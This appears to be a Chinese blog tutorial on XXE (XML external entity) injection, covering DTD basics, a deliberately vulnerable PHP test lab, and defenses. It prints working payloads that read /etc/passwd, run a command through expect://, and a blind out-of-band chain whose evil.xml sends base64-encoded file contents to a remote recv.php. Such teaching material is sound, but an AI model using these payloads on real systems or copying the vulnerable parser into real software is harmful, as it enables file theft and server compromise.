浅谈XXE漏洞

× 文章目录
  1. 1. XML与DTD的关系
  2. 2. XXE漏洞原理——XML实体
    1. 2.1. 普通实体引入外部实体
    2. 2.2. 参数实体引入外部实体
  3. 3. XXE漏洞类型与危害
    1. 3.1. I.任意文件读取
    2. 3.2. II.URL请求,SSRF
    3. 3.3. III.远程代码执行
  4. 4. XXE漏洞本地测试
    1. 4.1. 任意文件读取
    2. 4.2. 利用参数实体取得间接回显
  5. 5. XXE的防御
  6. 6. 参考传送门

XXE(XML External Entity Injection),即XML外部实体注入。漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载。

XML与DTD的关系

DTD(Document Type Definition)文档类型定义,一种XML约束模式语言,属于XML文件组成的一部分。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<!--文档声明-->
<?xml version="1.0" encoding="UTF-8"?>
<!--DTD-->
<!DOCTYPE poem [  <!--定义此文档是 poem 类型的文档-->
<!ELEMENT poem (author, title, content)>  <!--定义poem元素有三个子元素-->
<!ELEMENT author (#PCDATA)>  <!--定义author元素为“#PCDATA”类型-->
<!ELEMENT title (#PCDATA)>  <!--定义title元素为“#PCDATA”类型-->
<!ELEMENT content (#PCDATA)>  <!--定义content元素为“#PCDATA”类型-->
]>
<note>
<to>Dave</to>
<from>Tom</from>
<head>Hello</head>
<body>Hello world!</body>
</note>

DTD文档有三种应用形式。

内部DTD文档:

1
<!DOCTYPE 根元素 [定义内容]>

外部DTD文档:

1
<!DOCTYPE 根元素 SYSTEM "DTD文件路径">

内外部DTD文档结合:

1
<!DOCTYPE 根元素 SYSTEM "DTD文件路径" [定义内容]>

XXE漏洞原理——XML实体

实体主要分为四种:

  • 内置实体 (Built-in entities)
  • 字符实体 (Character entities)
  • 通用实体 (General entities)
  • 参数实体 (Parameter entities)

注: 完整实体类别可参考 DTD - Entities

其实,XML可分为普通实体参数实体

而根据实体声明方式的不同,还分为内部实体外部实体,XXE利用的是外部实体。

普通实体引入外部实体

1
2
3
4
5
6
7
<?xml version="1.0" encodinf="UTF-8"?>
<!DOCTYPE poem [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">  <!--可为file、http、ftp 等等协议-->
]>
<poem>
    &xxe;
</poem>

参数实体引入外部实体

1
2
3
4
5
6
7
8
9
10
<?xml version="1.0" encodinf="UTF-8"?>
<!DOCTYPE poem [
    <!ENTITY % a SYSTEM "http://www.test.com/outdtd.dtd">  <!--可为file、http、ftp 等等协议-->
    %a;  <!--执行outdtd.dtd的内容-->
]>
<poem>&xxe;</poem>
<!--outdtd.dtd内容-->
<!ELEMENT xxe SYSTEM "file:///etc/passwd">

注:外部资源的URI主要支持file、http、https、ftp等协议,对不同的程序所支持的协议不同。

XXE漏洞类型与危害

I.任意文件读取

通过外部实体引用,实现任意文件读取。

II.URL请求,SSRF

  • 端口扫描,探测内网服务
  • 内网攻击get型payload,如st2命令执行、discuz ssrf通过redis实施getshell;指纹识别等等
  • DoS拒绝服务:通过实体的递归调用,占用大量服务器资源。

III.远程代码执行

在php开启expect扩展的前提下

1
2
3
4
5
6
<!DOCTYPE root [
    <!ENTITY cmd SYSTEM "expect://id">
]>
<dir>
    <file>&cmd;</file>
</dir>

XXE漏洞本地测试

任意文件读取

构造index.htmlfunc.phptest.txtindex.html构造表单,并转换成XML字符串,发送到func.php转化成XML对象,并输出数据。

/index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<html>
<head>
	<title>xxe test</title>
	<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.8.0.js"></script>
</head>
<body>
	<form id="welcome" name="information">
		<span>Username:</span><input type="text" name="username"><br/>
		<span>E-mail:</span><input type="text" name="email"><br/>
		<button id="post">提交</button>
	</form>
	<script>
		function form2XML(obj){
			let iForm = document.getElementById(obj);
			let tmp = '';
			//获取所有type为'text'的input
			let aInput = Array.from(iForm.getElementsByTagName('input')).filter(x => x.type === 'text');
			for(v of aInput){
				let tagName = tagValue = '';
				tagName = v.name;
				tagValue = v.value;
				let tTag = `<${tagName}>${tagValue}</${tagName}>`;
				tmp += tTag;
			}
			let outXML = '<' + iForm.name + '>' + tmp + '</' + iForm.name + '>';
			return outXML;
		}
		//发送XML请求
		const post_btn = document.getElementById('post');
		post_btn.onclick = function(){
			$.ajax({
				url: "./func.php",
				data: form2XML('welcome'),
				type: 'POST',
				contentType: "text",
				success: function(data){
					document.write(data);
				},
				error: function(xhr, ajaxOptions, thrownError){
					console.log(xhr.status);
					console.log(thrownError);
				}
			});
			return false;
		}
	</script>
</body>
</html>
/func.php
1
2
3
4
5
6
7
8
9
<?php 
	//开启解析XML外部实体功能
	//libxml_disable_entity_loader(false); 
 	$xml = file_get_contents("php://input"); 
  	@$res = simplexml_load_string($xml); 
  	echo "name : " . $res->username . "\n";
	echo "email : " . $res->email;
?>

输入数据点击提交,利用burpsuite进行抓包:

修改XML数据,发包,可读取到test.txt的数据:

利用参数实体取得间接回显

对于传统的XXE来说,要求攻击者只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件,如果没有回显则可以使用Blind XXE漏洞来构建一条带外信道提取数据。

  1. 客户端发送payload1给Web服务器
  2. Web服务器向VPS获取恶意DTD,并执行文件读取payload2
  3. Web服务器带着回显结果访问VPS上特定FTP或者HTTP
  4. 黑客通过VPS获得回显

服务器中构造index.phpxxe.xmlflag.txt。VPS中构造evil.xmlrecv.phpdata.txt。其中flag.txt为要读取的数据,然后存入data.txt中。

/index.php
1
2
3
4
5
6
7
<?php
	$testXML = file_get_contents("xxe.xml");
	//libxml_disable_entity_loader(false);
	$xml = simplexml_load_string($testXML);
	echo "<pre>";
	print_r($xml);
?>
/xxe.xml
1
2
3
4
5
6
7
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
	<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=flag.txt">
	<!ENTITY % evildtd SYSTEM "http://www.ubuntu.com/evil.xml">
	%evildtd;
]>
<root></root>
/evil.xml
1
2
3
<!ENTITY % send "<!ENTITY &#37; data SYSTEM 'http://www.ubuntu.com/recv.php?file=%file;'>">
%send;
%data;
/recv.php
1
2
3
<?php  
file_put_contents("test.txt", base64_decode($_GET['file']));  
?>

访问服务器的index.php,服务器将去请求VPS上的evil.xml并执行,带上flag.txt经过base64加密后的内容
去请求VPS上的recv.php,于是将base64解码后的数据存入了data.txt。完成间接回显。

注:若flag.txt的读取不采用php://filter,则当文件内容包含空格换行等,将导致recv.php请求失败。

XXE的防御

  • 禁用外部实体
  • 过滤和验证用户提交的XML数据
  • 不允许XML中含有任何自己声明的DTD
  • 禁止外来引入,如在php中可设置libxml_disable_entity_loader(true)

参考传送门

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

很惭愧<br><br>只做了一点微小的工作<br>谢谢大家